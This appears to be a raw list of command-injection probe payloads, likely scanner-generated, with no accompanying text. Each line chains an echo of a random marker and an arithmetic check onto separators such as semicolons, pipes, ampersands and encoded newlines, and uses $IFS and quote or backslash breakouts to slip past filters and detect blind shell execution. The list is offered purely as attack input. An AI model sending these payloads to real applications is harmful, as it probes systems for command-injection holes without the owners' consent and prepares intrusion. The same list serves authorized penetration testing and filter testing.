+"%7C%7Cecho$IFSPDWJEU$((34%2B84))$(echo$IFSPDWJEU)PDWJEU& +"echo$IFSKQIOUW$((81%2B20))$(echo$IFSKQIOUW)KQIOUW| +"%20echo%20GBJIVY$((45%2B22))$(echo%20GBJIVY)GBJIVY| +";echo$IFSBIJBTP$((50%2B41))$(echo$IFSBIJBTP)BIJBTP| +"&echo$IFSOCYGAQ$((67%2B93))$(echo$IFSOCYGAQ)OCYGAQ| +"|echo$IFSLNNHJW$((48%2B51))$(echo$IFSLNNHJW)LNNHJW| +"||echo$IFSOOLSUP$((60%2B80))$(echo$IFSOOLSUP)OOLSUP| +"&&echo$IFSIKGBUU$((70%2B68))$(echo$IFSIKGBUU)IKGBUU| +"%0aecho$IFSYQRSAJ$((55%2B18))$(echo$IFSYQRSAJ)YQRSAJ| +"%3Becho$IFSYFIRUN$((89%2B93))$(echo$IFSYFIRUN)YFIRUN| +"%26echo$IFSTQUHGT$((51%2B9))$(echo$IFSTQUHGT)TQUHGT| +"%26%26echo$IFSMZMLZV$((47%2B52))$(echo$IFSMZMLZV)MZMLZV| +"%7Cecho$IFSYTBSTS$((24%2B38))$(echo$IFSYTBSTS)YTBSTS| +"%7C%7Cecho$IFSIVBZDH$((37%2B28))$(echo$IFSIVBZDH)IVBZDH| +"echo$IFSBYGLDF$((54%2B66))$(echo$IFSBYGLDF)BYGLDF%27 +"%20echo%20JKBAUZ$((16%2B4))$(echo%20JKBAUZ)JKBAUZ%27 +";echo$IFSQTBMHG$((67%2B82))$(echo$IFSQTBMHG)QTBMHG%27 +"&echo$IFSEFVKLM$((89%2B68))$(echo$IFSEFVKLM)EFVKLM%27 +"|echo$IFSTRBJHF$((51%2B94))$(echo$IFSTRBJHF)TRBJHF%27 +"||echo$IFSRJOBXI$((9%2B83))$(echo$IFSRJOBXI)RJOBXI%27 +"&&echo$IFSAVKTLV$((14%2B43))$(echo$IFSAVKTLV)AVKTLV%27 +"%0aecho$IFSOCKHHF$((36%2B24))$(echo$IFSOCKHHF)OCKHHF%27 +"%3Becho$IFSVWLOPP$((73%2B16))$(echo$IFSVWLOPP)VWLOPP%27 +"%26echo$IFSJNESPQ$((88%2B93))$(echo$IFSJNESPQ)JNESPQ%27 +"%26%26echo$IFSTXPRBJ$((40%2B83))$(echo$IFSTXPRBJ)TXPRBJ%27 +"%7Cecho$IFSAZYLZZ$((51%2B97))$(echo$IFSAZYLZZ)AZYLZZ%27 +"%7C%7Cecho$IFSWGMPYH$((66%2B86))$(echo$IFSWGMPYH)WGMPYH%27 +"echo$IFSWOMGRC$((0%2B46))$(echo$IFSWOMGRC)WOMGRC%22 +"%20echo%20TCQTDE$((89%2B22))$(echo%20TCQTDE)TCQTDE%22 +";echo$IFSZRNVWQ$((61%2B2))$(echo$IFSZRNVWQ)ZRNVWQ%22 +"&echo$IFSFNFBIK$((62%2B22))$(echo$IFSFNFBIK)FNFBIK%22 +"|echo$IFSIWKOFU$((23%2B55))$(echo$IFSIWKOFU)IWKOFU%22 +"||echo$IFSVSJPYU$((58%2B8))$(echo$IFSVSJPYU)VSJPYU%22 +"&&echo$IFSULAPAW$((32%2B88))$(echo$IFSULAPAW)ULAPAW%22 +"%0aecho$IFSKNQUII$((48%2B98))$(echo$IFSKNQUII)KNQUII%22 +"%3Becho$IFSGAHIQG$((68%2B82))$(echo$IFSGAHIQG)GAHIQG%22 +"%26echo$IFSSWZDEK$((23%2B62))$(echo$IFSSWZDEK)SWZDEK%22 +"%26%26echo$IFSMDMXCZ$((12%2B2))$(echo$IFSMDMXCZ)MDMXCZ%22 +"%7Cecho$IFSRGIMYI$((25%2B41))$(echo$IFSRGIMYI)RGIMYI%22 +"%7C%7Cecho$IFSKRLDUJ$((29%2B25))$(echo$IFSKRLDUJ)KRLDUJ%22 +"echo$IFSZTLCXA$((92%2B39))$(echo$IFSZTLCXA)ZTLCXA%5C%5C +"%20echo%20NNFNUJ$((32%2B42))$(echo%20NNFNUJ)NNFNUJ%5C%5C +";echo$IFSNOILCW$((35%2B50))$(echo$IFSNOILCW)NOILCW%5C%5C +"&echo$IFSIZIKXP$((4%2B56))$(echo$IFSIZIKXP)IZIKXP%5C%5C +"|echo$IFSDKKFUX$((53%2B64))$(echo$IFSDKKFUX)DKKFUX%5C%5C +"||echo$IFSONWUBF$((85%2B46))$(echo$IFSONWUBF)ONWUBF%5C%5C +"&&echo$IFSYBFPVK$((15%2B44))$(echo$IFSYBFPVK)YBFPVK%5C%5C +"%0aecho$IFSCOKBAQ$((26%2B6))$(echo$IFSCOKBAQ)COKBAQ%5C%5C +"%3Becho$IFSMCZBTD$((19%2B12))$(echo$IFSMCZBTD)MCZBTD%5C%5C +"%26echo$IFSFGSFXK$((50%2B67))$(echo$IFSFGSFXK)FGSFXK%5C%5C +"%26%26echo$IFSMGZYUX$((69%2B27))$(echo$IFSMGZYUX)MGZYUX%5C%5C +"%7Cecho$IFSZOHIKN$((60%2B22))$(echo$IFSZOHIKN)ZOHIKN%5C%5C +"%7C%7Cecho$IFSWVBHRV$((70%2B26))$(echo$IFSWVBHRV)WVBHRV%5C%5C +"echo$IFSTDYQVX$((81%2B75))$(echo$IFSTDYQVX)TDYQVX%2F%2F +"%20echo%20MDJMHU$((0%2B77))$(echo%20MDJMHU)MDJMHU%2F%2F +";echo$IFSJMVDKT$((29%2B56))$(echo$IFSJMVDKT)JMVDKT%2F%2F +"&echo$IFSHAWFWE$((23%2B63))$(echo$IFSHAWFWE)HAWFWE%2F%2F +"|echo$IFSNPJOUL$((60%2B57))$(echo$IFSNPJOUL)NPJOUL%2F%2F +"||echo$IFSTJIKIW$((44%2B78))$(echo$IFSTJIKIW)TJIKIW%2F%2F +"&&echo$IFSOLYCAK$((57%2B64))$(echo$IFSOLYCAK)OLYCAK%2F%2F +"%0aecho$IFSRSKGDD$((67%2B8))$(echo$IFSRSKGDD)RSKGDD%2F%2F +"%3Becho$IFSEKSIGH$((71%2B77))$(echo$IFSEKSIGH)EKSIGH%2F%2F +"%26echo$IFSEQHFOG$((96%2B31))$(echo$IFSEQHFOG)EQHFOG%2F%2F +"%26%26echo$IFSEOCQFN$((57%2B12))$(echo$IFSEOCQFN)EOCQFN%2F%2F +"%7Cecho$IFSRCWERA$((82%2B63))$(echo$IFSRCWERA)RCWERA%2F%2F +"%7C%7Cecho$IFSUHQPMD$((69%2B4))$(echo$IFSUHQPMD)UHQPMD%2F%2F +"echo$IFSITSADJ$((94%2B48))$(echo$IFSITSADJ)ITSADJ%26 +"%20echo%20FBOBLU$((92%2B42))$(echo%20FBOBLU)FBOBLU%26 +";echo$IFSAJPXYF$((20%2B50))$(echo$IFSAJPXYF)AJPXYF%26 +"&echo$IFSUZTQCV$((96%2B22))$(echo$IFSUZTQCV)UZTQCV%26 +"|echo$IFSIGVJXX$((65%2B58))$(echo$IFSIGVJXX)IGVJXX%26 +"||echo$IFSMTADSX$((4%2B83))$(echo$IFSMTADSX)MTADSX%26 +"&&echo$IFSITCFYR$((58%2B9))$(echo$IFSITCFYR)ITCFYR%26 +"%0aecho$IFSYBTXPF$((15%2B35))$(echo$IFSYBTXPF)YBTXPF%26 +"%3Becho$IFSVELPDH$((10%2B78))$(echo$IFSVELPDH)VELPDH%26 +"%26echo$IFSTYVQZP$((31%2B21))$(echo$IFSTYVQZP)TYVQZP%26 +"%26%26echo$IFSFWROXW$((61%2B7))$(echo$IFSFWROXW)FWROXW%26 +"%7Cecho$IFSQWRACU$((69%2B14))$(echo$IFSQWRACU)QWRACU%26 +"%7C%7Cecho$IFSROIMQV$((24%2B28))$(echo$IFSROIMQV)ROIMQV%26 +"echo$IFSNIKGBF$((93%2B83))$(echo$IFSNIKGBF)NIKGBF%7C +"%20echo%20KCONLL$((35%2B55))$(echo%20KCONLL)KCONLL%7C +";echo$IFSPUUABZ$((55%2B91))$(echo$IFSPUUABZ)PUUABZ%7C +"&echo$IFSHZEEMN$((80%2B42))$(echo$IFSHZEEMN)HZEEMN%7C +"|echo$IFSCDYIRQ$((76%2B46))$(echo$IFSCDYIRQ)CDYIRQ%7C +"||echo$IFSZGHLKC$((8%2B4))$(echo$IFSZGHLKC)ZGHLKC%7C +"&&echo$IFSMNOJXK$((12%2B14))$(echo$IFSMNOJXK)MNOJXK%7C +"%0aecho$IFSRZUUUX$((19%2B70))$(echo$IFSRZUUUX)RZUUUX%7C +"%3Becho$IFSCHRPGA$((61%2B12))$(echo$IFSCHRPGA)CHRPGA%7C +"%26echo$IFSJQOKUV$((22%2B52))$(echo$IFSJQOKUV)JQOKUV%7C +"%26%26echo$IFSDQZQSK$((47%2B7))$(echo$IFSDQZQSK)DQZQSK%7C +"%7Cecho$IFSFIANHU$((22%2B49))$(echo$IFSFIANHU)FIANHU%7C +"%7C%7Cecho$IFSCBHHKP$((85%2B54))$(echo$IFSCBHHKP)CBHHKP%7C +|echo$IFSLCSZUM$((46%2B15))$(echo$IFSLCSZUM)LCSZUM +|%20echo%20DLVBOK$((16%2B62))$(echo%20DLVBOK)DLVBOK +;echo$IFSOQQLKY$((10%2B54))$(echo$IFSOQQLKY)OQQLKY +&echo$IFSMHSVGL$((14%2B50))$(echo$IFSMHSVGL)MHSVGL +|echo$IFSNPYJMP$((96%2B63))$(echo$IFSNPYJMP)NPYJMP +||echo$IFSDZTQUV$((58%2B75))$(echo$IFSDZTQUV)DZTQUV +&&echo$IFSCOIZAX$((91%2B92))$(echo$IFSCOIZAX)COIZAX +%0aecho$IFSILXOOR$((23%2B61))$(echo$IFSILXOOR)ILXOOR +%3Becho$IFSWAGECK$((2%2B54))$(echo$IFSWAGECK)WAGECK +%26echo$IFSBQOVXE$((69%2B56))$(echo$IFSBQOVXE)BQOVXE +%26%26echo$IFSESILOB$((37%2B51))$(echo$IFSESILOB)ESILOB +%7Cecho$IFSUJPLGH$((62%2B6))$(echo$IFSUJPLGH)UJPLGH +%7C%7Cecho$IFSULGQGO$((89%2B48))$(echo$IFSULGQGO)ULGQGO +echo$IFSLIXPWR$((69%2B26))$(echo$IFSLIXPWR)LIXPWR' +%20echo%20EMRSDD$((80%2B35))$(echo%20EMRSDD)EMRSDD' +;echo$IFSOLQCLP$((7%2B9))$(echo$IFSOLQCLP)OLQCLP' +&echo$IFSUHFGHJ$((52%2B93))$(echo$IFSUHFGHJ)UHFGHJ' +|echo$IFSTYVVOX$((65%2B44))$(echo$IFSTYVVOX)TYVVOX' +||echo$IFSCQTNFT$((87%2B14))$(echo$IFSCQTNFT)CQTNFT' +&&echo$IFSCWFCPC$((35%2B74))$(echo$IFSCWFCPC)CWFCPC' +%0aecho$IFSBUIOLU$((83%2B61))$(echo$IFSBUIOLU)BUIOLU' +%3Becho$IFSSUZDDM$((32%2B20))$(echo$IFSSUZDDM)SUZDDM' +%26echo$IFSLHKOZD$((2%2B55))$(echo$IFSLHKOZD)LHKOZD' +%26%26echo$IFSWAEWHA$((84%2B51))$(echo$IFSWAEWHA)WAEWHA' +%7Cecho$IFSFUOWKT$((11%2B83))$(echo$IFSFUOWKT)FUOWKT' +%7C%7Cecho$IFSDPGMPX$((72%2B63))$(echo$IFSDPGMPX)DPGMPX' +echo$IFSAUYTPO$((72%2B52))$(echo$IFSAUYTPO)AUYTPO" +%20echo%20GVYWYM$((61%2B13))$(echo%20GVYWYM)GVYWYM" +;echo$IFSSNFHZG$((95%2B62))$(echo$IFSSNFHZG)SNFHZG" +&echo$IFSFMZXIF$((30%2B31))$(echo$IFSFMZXIF)FMZXIF" +|echo$IFSMNZFPI$((24%2B76))$(echo$IFSMNZFPI)MNZFPI" +||echo$IFSKPSLUB$((16%2B33))$(echo$IFSKPSLUB)KPSLUB" +&&echo$IFSHHBLVW$((31%2B45))$(echo$IFSHHBLVW)HHBLVW" +%0aecho$IFSBRJHDI$((98%2B17))$(echo$IFSBRJHDI)BRJHDI" +%3Becho$IFSLIWOMV$((30%2B61))$(echo$IFSLIWOMV)LIWOMV" +%26echo$IFSJQVAMD$((56%2B15))$(echo$IFSJQVAMD)JQVAMD" +%26%26echo$IFSVHKGMR$((26%2B28))$(echo$IFSVHKGMR)VHKGMR" +%7Cecho$IFSJJIMGS$((39%2B63))$(echo$IFSJJIMGS)JJIMGS" +%7C%7Cecho$IFSLSGJRQ$((28%2B34))$(echo$IFSLSGJRQ)LSGJRQ" +echo$IFSSWOEAI$((89%2B70))$(echo$IFSSWOEAI)SWOEAI +%20echo%20WKKPJF$((94%2B30))$(echo%20WKKPJF)WKKPJF +;echo$IFSWUQPLA$((73%2B27))$(echo$IFSWUQPLA)WUQPLA +&echo$IFSBXBVOS$((78%2B10))$(echo$IFSBXBVOS)BXBVOS +|echo$IFSLXLUOD$((68%2B51))$(echo$IFSLXLUOD)LXLUOD +||echo$IFSDPTPFZ$((37%2B20))$(echo$IFSDPTPFZ)DPTPFZ +&&echo$IFSRIRRVG$((43%2B47))$(echo$IFSRIRRVG)RIRRVG +%0aecho$IFSHSVHKA$((85%2B77))$(echo$IFSHSVHKA)HSVHKA +%3Becho$IFSCIDNHM$((30%2B88))$(echo$IFSCIDNHM)CIDNHM +%26echo$IFSTYUNYQ$((1%2B27))$(echo$IFSTYUNYQ)TYUNYQ +%26%26echo$IFSQLXSPL$((22%2B2))$(echo$IFSQLXSPL)QLXSPL +%7Cecho$IFSTXNBJZ$((0%2B67))$(echo$IFSTXNBJZ)TXNBJZ +%7C%7Cecho$IFSGHEBEC$((72%2B52))$(echo$IFSGHEBEC)GHEBEC +echo$IFSUMOYPF$((66%2B31))$(echo$IFSUMOYPF)UMOYPF// +%20echo%20VRYUIC$((62%2B65))$(echo%20VRYUIC)VRYUIC// +;echo$IFSEMLBQR$((31%2B56))$(echo$IFSEMLBQR)EMLBQR// +&echo$IFSOCUZHX$((85%2B82))$(echo$IFSOCUZHX)OCUZHX// +|echo$IFSEZAPVW$((95%2B18))$(echo$IFSEZAPVW)EZAPVW// +||echo$IFSIWAFLA$((17%2B83))$(echo$IFSIWAFLA)IWAFLA// +&&echo$IFSAKRGLM$((80%2B60))$(echo$IFSAKRGLM)AKRGLM// +%0aecho$IFSOIOFXV$((43%2B15))$(echo$IFSOIOFXV)OIOFXV// +%3Becho$IFSNGWBSU$((48%2B3))$(echo$IFSNGWBSU)NGWBSU// +%26echo$IFSGSBMEB$((40%2B21))$(echo$IFSGSBMEB)GSBMEB// +%26%26echo$IFSDTKGOW$((36%2B42))$(echo$IFSDTKGOW)DTKGOW// +%7Cecho$IFSOHOTGG$((99%2B58))$(echo$IFSOHOTGG)OHOTGG// +%7C%7Cecho$IFSIODRIH$((80%2B87))$(echo$IFSIODRIH)IODRIH// +echo$IFSUPLBDT$((24%2B49))$(echo$IFSUPLBDT)UPLBDT\ +%20echo%20TXNMBR$((39%2B88))$(echo%20TXNMBR)TXNMBR\ +;echo$IFSUAHSRY$((0%2B55))$(echo$IFSUAHSRY)UAHSRY\ +&echo$IFSYVPJGQ$((92%2B10))$(echo$IFSYVPJGQ)YVPJGQ\ +|echo$IFSEBBOEZ$((37%2B91))$(echo$IFSEBBOEZ)EBBOEZ\ +||echo$IFSVSCFSB$((3%2B2))$(echo$IFSVSCFSB)VSCFSB\ +&&echo$IFSQXNYWT$((50%2B82))$(echo$IFSQXNYWT)QXNYWT\ +%0aecho$IFSLBYCDI$((79%2B92))$(echo$IFSLBYCDI)LBYCDI\ +%3Becho$IFSDXMRQT$((52%2B34))$(echo$IFSDXMRQT)DXMRQT\ +%26echo$IFSJREIYL$((10%2B95))$(echo$IFSJREIYL)JREIYL\ +%26%26echo$IFSHCFVYN$((99%2B28))$(echo$IFSHCFVYN)HCFVYN\ +%7Cecho$IFSSUHYSU$((21%2B53))$(echo$IFSSUHYSU)SUHYSU\ +%7C%7Cecho$IFSALLVVO$((50%2B22))$(echo$IFSALLVVO)ALLVVO\ +echo$IFSLGTLKK$((65%2B27))$(echo$IFSLGTLKK)LGTLKK& +%20echo%20GBSQUY$((50%2B66))$(echo%20GBSQUY)GBSQUY& +;echo$IFSZQHRWI$((42%2B35))$(echo$IFSZQHRWI)ZQHRWI& +&echo$IFSZJOTOV$((13%2B82))$(echo$IFSZJOTOV)ZJOTOV& +|echo$IFSTNAENV$((39%2B94))$(echo$IFSTNAENV)TNAENV& +||echo$IFSJVYMEK$((76%2B35))$(echo$IFSJVYMEK)JVYMEK& +&&echo$IFSQDJECI$((28%2B96))$(echo$IFSQDJECI)QDJECI& +%0aecho$IFSHJRQCU$((0%2B63))$(echo$IFSHJRQCU)HJRQCU& +%3Becho$IFSIOLXIC$((8%2B16))$(echo$IFSIOLXIC)IOLXIC& +%26echo$IFSSCHCVM$((93%2B31))$(echo$IFSSCHCVM)SCHCVM& +%26%26echo$IFSBGVLEQ$((60%2B59))$(echo$IFSBGVLEQ)BGVLEQ& +%7Cecho$IFSEDDVWA$((82%2B98))$(echo$IFSEDDVWA)EDDVWA& +%7C%7Cecho$IFSKNLSBT$((88%2B60))$(echo$IFSKNLSBT)KNLSBT& +echo$IFSQGZFHM$((40%2B15))$(echo$IFSQGZFHM)QGZFHM| +%20echo%20EIFXCG$((20%2B68))$(echo%20EIFXCG)EIFXCG| +;echo$IFSCKYHAJ$((39%2B53))$(echo$IFSCKYHAJ)CKYHAJ| +&echo$IFSOUBRDR$((47%2B29))$(echo$IFSOUBRDR)OUBRDR| +|echo$IFSUFZURL$((39%2B84))$(echo$IFSUFZURL)UFZURL| +||echo$IFSWOBQDK$((42%2B28))$(echo$IFSWOBQDK)WOBQDK| +&&echo$IFSSUJVLB$((59%2B86))$(echo$IFSSUJVLB)SUJVLB| +%0aecho$IFSSNIVPI$((9%2B71))$(echo$IFSSNIVPI)SNIVPI| +%3Becho$IFSMKSRXM$((30%2B19))$(echo$IFSMKSRXM)MKSRXM| +%26echo$IFSIRVZDV$((73%2B9))$(echo$IFSIRVZDV)IRVZDV| +%26%26echo$IFSWBIFGE$((67%2B32))$(echo$IFSWBIFGE)WBIFGE| +%7Cecho$IFSREQHRF$((82%2B40))$(echo$IFSREQHRF)REQHRF| +%7C%7Cecho$IFSEJZUFX$((9%2B88))$(echo$IFSEJZUFX)EJZUFX| +echo$IFSRHERRD$((18%2B82))$(echo$IFSRHERRD)RHERRD%27 +%20echo%20HXCOZT$((48%2B89))$(echo%20HXCOZT)HXCOZT%27 +;echo$IFSSYZLKW$((13%2B55))$(echo$IFSSYZLKW)SYZLKW%27 +&echo$IFSWBYLPB$((80%2B54))$(echo$IFSWBYLPB)WBYLPB%27 +|echo$IFSGFLOUA$((7%2B71))$(echo$IFSGFLOUA)GFLOUA%27 +||echo$IFSBCZPXJ$((39%2B35))$(echo$IFSBCZPXJ)BCZPXJ%27 +&&echo$IFSGWXAGT$((52%2B45))$(echo$IFSGWXAGT)GWXAGT%27 +%0aecho$IFSRZZKHJ$((26%2B66))$(echo$IFSRZZKHJ)RZZKHJ%27 +%3Becho$IFSIEOSEZ$((86%2B74))$(echo$IFSIEOSEZ)IEOSEZ%27 +%26echo$IFSRGSNFF$((14%2B60))$(echo$IFSRGSNFF)RGSNFF%27 +%26%26echo$IFSNSUHXN$((87%2B12))$(echo$IFSNSUHXN)NSUHXN%27 +%7Cecho$IFSVJNFLD$((16%2B2))$(echo$IFSVJNFLD)VJNFLD%27 +%7C%7Cecho$IFSWJYCOX$((21%2B64))$(echo$IFSWJYCOX)WJYCOX%27 +echo$IFSQYFURG$((23%2B53))$(echo$IFSQYFURG)QYFURG%22 +%20echo%20JCFSBN$((7%2B70))$(echo%20JCFSBN)JCFSBN%22 +;echo$IFSBUCQOY$((75%2B89))$(echo$IFSBUCQOY)BUCQOY%22 +&echo$IFSINJILM$((12%2B86))$(echo$IFSINJILM)INJILM%22 +|echo$IFSMNCLPS$((56%2B63))$(echo$IFSMNCLPS)MNCLPS%22 +||echo$IFSMWNDWI$((5%2B99))$(echo$IFSMWNDWI)MWNDWI%22 +&&echo$IFSXITZZU$((72%2B57))$(echo$IFSXITZZU)XITZZU%22 +%0aecho$IFSKGOAAS$((28%2B98))$(echo$IFSKGOAAS)KGOAAS%22 +%3Becho$IFSHLZSZR$((18%2B53))$(echo$IFSHLZSZR)HLZSZR%22 +%26echo$IFSFZIREE$((3%2B27))$(echo$IFSFZIREE)FZIREE%22 +%26%26echo$IFSBFEQYV$((65%2B19))$(echo$IFSBFEQYV)BFEQYV%22 +%7Cecho$IFSXHRRAU$((47%2B66))$(echo$IFSXHRRAU)XHRRAU%22 +%7C%7Cecho$IFSVNAEYF$((4%2B92))$(echo$IFSVNAEYF)VNAEYF%22 +echo$IFSMYDTOQ$((99%2B59))$(echo$IFSMYDTOQ)MYDTOQ%5C%5C +%20echo%20MIBJNK$((69%2B50))$(echo%20MIBJNK)MIBJNK%5C%5C +;echo$IFSKUMZWI$((52%2B68))$(echo$IFSKUMZWI)KUMZWI%5C%5C +&echo$IFSRXZUMT$((27%2B20))$(echo$IFSRXZUMT)RXZUMT%5C%5C +|echo$IFSGQAGTE$((24%2B60))$(echo$IFSGQAGTE)GQAGTE%5C%5C +||echo$IFSEWIIAA$((5%2B86))$(echo$IFSEWIIAA)EWIIAA%5C%5C +&&echo$IFSHBSRNA$((99%2B81))$(echo$IFSHBSRNA)HBSRNA%5C%5C +%0aecho$IFSWNSKHN$((91%2B97))$(echo$IFSWNSKHN)WNSKHN%5C%5C +%3Becho$IFSXCIDGL$((84%2B77))$(echo$IFSXCIDGL)XCIDGL%5C%5C +%26echo$IFSTBOHOL$((39%2B63))$(echo$IFSTBOHOL)TBOHOL%5C%5C +%26%26echo$IFSMEDCEY$((8%2B25))$(echo$IFSMEDCEY)MEDCEY%5C%5C +%7Cecho$IFSZVMYPN$((92%2B94))$(echo$IFSZVMYPN)ZVMYPN%5C%5C +%7C%7Cecho$IFSLZMNQW$((6%2B85))$(echo$IFSLZMNQW)LZMNQW%5C%5C +echo$IFSUBGQBR$((73%2B83))$(echo$IFSUBGQBR)UBGQBR%2F%2F +%20echo%20XRKWTL$((1%2B66))$(echo%20XRKWTL)XRKWTL%2F%2F +;echo$IFSMTRJCW$((52%2B99))$(echo$IFSMTRJCW)MTRJCW%2F%2F +&echo$IFSNRXRKE$((21%2B36))$(echo$IFSNRXRKE)NRXRKE%2F%2F +|echo$IFSNUKWZR$((1%2B54))$(echo$IFSNUKWZR)NUKWZR%2F%2F +||echo$IFSCQDQPG$((96%2B92))$(echo$IFSCQDQPG)CQDQPG%2F%2F +&&echo$IFSGTBDWG$((18%2B89))$(echo$IFSGTBDWG)GTBDWG%2F%2F +%0aecho$IFSOVTGKS$((3%2B77))$(echo$IFSOVTGKS)OVTGKS%2F%2F +%3Becho$IFSOTOVJM$((53%2B74))$(echo$IFSOTOVJM)OTOVJM%2F%2F +%26echo$IFSUUYWYN$((46%2B27))$(echo$IFSUUYWYN)UUYWYN%2F%2F +%26%26echo$IFSLQSHYA$((83%2B67))$(echo$IFSLQSHYA)LQSHYA%2F%2F +%7Cecho$IFSIBAZCJ$((13%2B42))$(echo$IFSIBAZCJ)IBAZCJ%2F%2F +%7C%7Cecho$IFSQFSVNV$((60%2B49))$(echo$IFSQFSVNV)QFSVNV%2F%2F +echo$IFSPNBSWR$((27%2B39))$(echo$IFSPNBSWR)PNBSWR%26 +%20echo%20ZTYATW$((99%2B18))$(echo%20ZTYATW)ZTYATW%26 +;echo$IFSSKFBVG$((56%2B51))$(echo$IFSSKFBVG)SKFBVG%26 +&echo$IFSPNMRRI$((20%2B12))$(echo$IFSPNMRRI)PNMRRI%26 +|echo$IFSZRNWFA$((82%2B53))$(echo$IFSZRNWFA)ZRNWFA%26 +||echo$IFSZFIGIN$((20%2B19))$(echo$IFSZFIGIN)ZFIGIN%26 +&&echo$IFSCPFUWZ$((25%2B32))$(echo$IFSCPFUWZ)CPFUWZ%26 +%0aecho$IFSNWIALT$((43%2B48))$(echo$IFSNWIALT)NWIALT%26 +%3Becho$IFSIKLHQK$((57%2B99))$(echo$IFSIKLHQK)IKLHQK%26 +%26echo$IFSRAALVW$((18%2B87))$(echo$IFSRAALVW)RAALVW%26 +%26%26echo$IFSGNWSGN$((55%2B55))$(echo$IFSGNWSGN)GNWSGN%26 +%7Cecho$IFSUUEUUP$((8%2B33))$(echo$IFSUUEUUP)UUEUUP%26 +%7C%7Cecho$IFSYCIWOC$((49%2B44))$(echo$IFSYCIWOC)YCIWOC%26 +echo$IFSCOBXOA$((38%2B15))$(echo$IFSCOBXOA)COBXOA%7C +%20echo%20MUBTOH$((84%2B39))$(echo%20MUBTOH)MUBTOH%7C +;echo$IFSVQMZED$((6%2B60))$(echo$IFSVQMZED)VQMZED%7C +&echo$IFSUVSLMN$((90%2B46))$(echo$IFSUVSLMN)UVSLMN%7C +|echo$IFSCSPCGY$((33%2B53))$(echo$IFSCSPCGY)CSPCGY%7C +||echo$IFSJYWQAM$((97%2B96))$(echo$IFSJYWQAM)JYWQAM%7C +&&echo$IFSRRGUBD$((41%2B37))$(echo$IFSRRGUBD)RRGUBD%7C +%0aecho$IFSOIFCVY$((56%2B63))$(echo$IFSOIFCVY)OIFCVY%7C +%3Becho$IFSZULPXH$((28%2B66))$(echo$IFSZULPXH)ZULPXH%7C +%26echo$IFSRSDEJN$((15%2B54))$(echo$IFSRSDEJN)RSDEJN%7C +%26%26echo$IFSRIODOR$((41%2B80))$(echo$IFSRIODOR)RIODOR%7C +%7Cecho$IFSLAITXQ$((45%2B1))$(echo$IFSLAITXQ)LAITXQ%7C +%7C%7Cecho$IFSAEFKTR$((17%2B29))$(echo$IFSAEFKTR)AEFKTR%7C +&echo$IFSQLXHQO$((79%2B66))$(echo$IFSQLXHQO)QLXHQO +&%20echo%20MFHLGK$((15%2B22))$(echo%20MFHLGK)MFHLGK +;echo$IFSTLVRXR$((1%2B4))$(echo$IFSTLVRXR)TLVRXR +&echo$IFSSSWXIY$((27%2B62))$(echo$IFSSSWXIY)SSWXIY +|echo$IFSWWTABV$((78%2B81))$(echo$IFSWWTABV)WWTABV +||echo$IFSPYNPEK$((48%2B2))$(echo$IFSPYNPEK)PYNPEK +&&echo$IFSVGQLPU$((4%2B29))$(echo$IFSVGQLPU)VGQLPU +%0aecho$IFSKTAVMG$((29%2B10))$(echo$IFSKTAVMG)KTAVMG +%3Becho$IFSAMABXP$((6%2B24))$(echo$IFSAMABXP)AMABXP +%26echo$IFSNHKZXU$((79%2B34))$(echo$IFSNHKZXU)NHKZXU +%26%26echo$IFSKNHRIG$((80%2B9))$(echo$IFSKNHRIG)KNHRIG +%7Cecho$IFSUNCOLW$((89%2B19))$(echo$IFSUNCOLW)UNCOLW +%7C%7Cecho$IFSKJHMXN$((3%2B73))$(echo$IFSKJHMXN)KJHMXN +echo$IFSPHZRPA$((83%2B65))$(echo$IFSPHZRPA)PHZRPA' +%20echo%20VDKKTU$((48%2B39))$(echo%20VDKKTU)VDKKTU' +;echo$IFSVMHPMF$((49%2B68))$(echo$IFSVMHPMF)VMHPMF' +&echo$IFSDMXXTC$((63%2B90))$(echo$IFSDMXXTC)DMXXTC' +|echo$IFSLITPAE$((90%2B42))$(echo$IFSLITPAE)LITPAE' +||echo$IFSHBKZPS$((90%2B74))$(echo$IFSHBKZPS)HBKZPS' +&&echo$IFSKGICZJ$((97%2B57))$(echo$IFSKGICZJ)KGICZJ' +%0aecho$IFSAPAMDC$((36%2B45))$(echo$IFSAPAMDC)APAMDC' +%3Becho$IFSZZSYFZ$((36%2B96))$(echo$IFSZZSYFZ)ZZSYFZ' +%26echo$IFSHYWHUO$((82%2B84))$(echo$IFSHYWHUO)HYWHUO' +%26%26echo$IFSAHQKXM$((2%2B20))$(echo$IFSAHQKXM)AHQKXM' +%7Cecho$IFSDJDWOB$((53%2B10))$(echo$IFSDJDWOB)DJDWOB' +%7C%7Cecho$IFSJHTHVW$((39%2B26))$(echo$IFSJHTHVW)JHTHVW' +echo$IFSNCOJPQ$((15%2B89))$(echo$IFSNCOJPQ)NCOJPQ" +%20echo%20PHHQZJ$((49%2B63))$(echo%20PHHQZJ)PHHQZJ" +;echo$IFSVABEPU$((8%2B54))$(echo$IFSVABEPU)VABEPU" +&echo$IFSMONACC$((64%2B29))$(echo$IFSMONACC)MONACC" +|echo$IFSTCSNMN$((49%2B88))$(echo$IFSTCSNMN)TCSNMN" +||echo$IFSYTRRVT$((47%2B76))$(echo$IFSYTRRVT)YTRRVT" +&&echo$IFSUGIZFE$((95%2B79))$(echo$IFSUGIZFE)UGIZFE" +%0aecho$IFSJCTEQY$((49%2B31))$(echo$IFSJCTEQY)JCTEQY" +%3Becho$IFSLWOCMM$((20%2B40))$(echo$IFSLWOCMM)LWOCMM" +%26echo$IFSNKAEHH$((28%2B48))$(echo$IFSNKAEHH)NKAEHH" +%26%26echo$IFSAHYRFK$((59%2B15))$(echo$IFSAHYRFK)AHYRFK" +%7Cecho$IFSQIUHMW$((18%2B27))$(echo$IFSQIUHMW)QIUHMW" +%7C%7Cecho$IFSKELZXS$((60%2B60))$(echo$IFSKELZXS)KELZXS" +echo$IFSHIVKNH$((59%2B63))$(echo$IFSHIVKNH)HIVKNH +%20echo%20GBXOPJ$((13%2B32))$(echo%20GBXOPJ)GBXOPJ +;echo$IFSGBSBJK$((78%2B77))$(echo$IFSGBSBJK)GBSBJK +&echo$IFSJUJDFI$((75%2B24))$(echo$IFSJUJDFI)JUJDFI +|echo$IFSCYOSPJ$((41%2B88))$(echo$IFSCYOSPJ)CYOSPJ +||echo$IFSPQBYOG$((45%2B3))$(echo$IFSPQBYOG)PQBYOG +&&echo$IFSWQDKJH$((20%2B60))$(echo$IFSWQDKJH)WQDKJH +%0aecho$IFSXOCRRA$((3%2B1))$(echo$IFSXOCRRA)XOCRRA 